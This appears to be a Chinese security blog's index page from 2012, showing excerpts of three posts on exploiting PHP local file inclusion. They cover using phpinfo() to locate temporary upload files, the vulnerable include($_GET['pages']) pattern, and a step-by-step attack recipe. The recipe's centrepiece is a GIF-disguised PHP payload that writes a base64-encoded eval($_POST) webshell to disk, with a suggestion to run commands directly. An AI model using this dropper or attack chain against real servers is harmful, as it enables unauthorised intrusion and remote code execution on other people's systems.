利用phpinfo信息LFI临时文件

分类:安全 | 2012-02-12 | 撸过 1,293 次
1人扯谈

还记得之前国外某牛提出的LFI包含临时文件么?

当时确实觉得有些鸡肋,因为临时文件的路径及名字是未知的,虽然临时文件的名字可以利用类似<>*?等通配符(我们暂且称其为通配符)匹配,而同时N个人一起请求的话可能同时生成很多临时文件,因此用通配符也不一定能匹配成,而且临时文件保存的路径也只能靠猜。

我们知道在向服务器上任意php文件post请求上传数据时,都会生成临时文件,以前不知道临时文件的路径和名字只能乱猜,这次国外友人提出利用phpinfo()。

当向任意php文件post请求上传数据时,可以直接在phpinfo页面找到临时文件的路径及名字。

 

参考:

h[......]

继续阅读

LFI漏洞利用总结

分类:安全 | 2012-02-12 | 撸过 1,027 次
1人扯谈

主要涉及到的函数

include(),require()、include_once(),require_once()

magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、 post_max_size()、 and max_input_time()等

典型漏洞代码:

<!–?php include($_GET['pages'].‘.php’); ?–>

[......]

继续阅读

LFI漏洞使用心得

分类:安全 | 2012-02-12 | 撸过 478 次
0人扯谈

1.找到LFI本地包含的漏洞

2.想办法上传不管是通过bbs,FCKEDITOR或者其他任何方式

3.使用如下代码

gif89a0<?fputs(fopen("3.php", "w"), base64_decode("JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1Qm5vdGhhY2slNUQlMjklM0IlM0YlM0U="));?>

 

4.如果没有写入权限可以直接写脚本进行执行命令操作等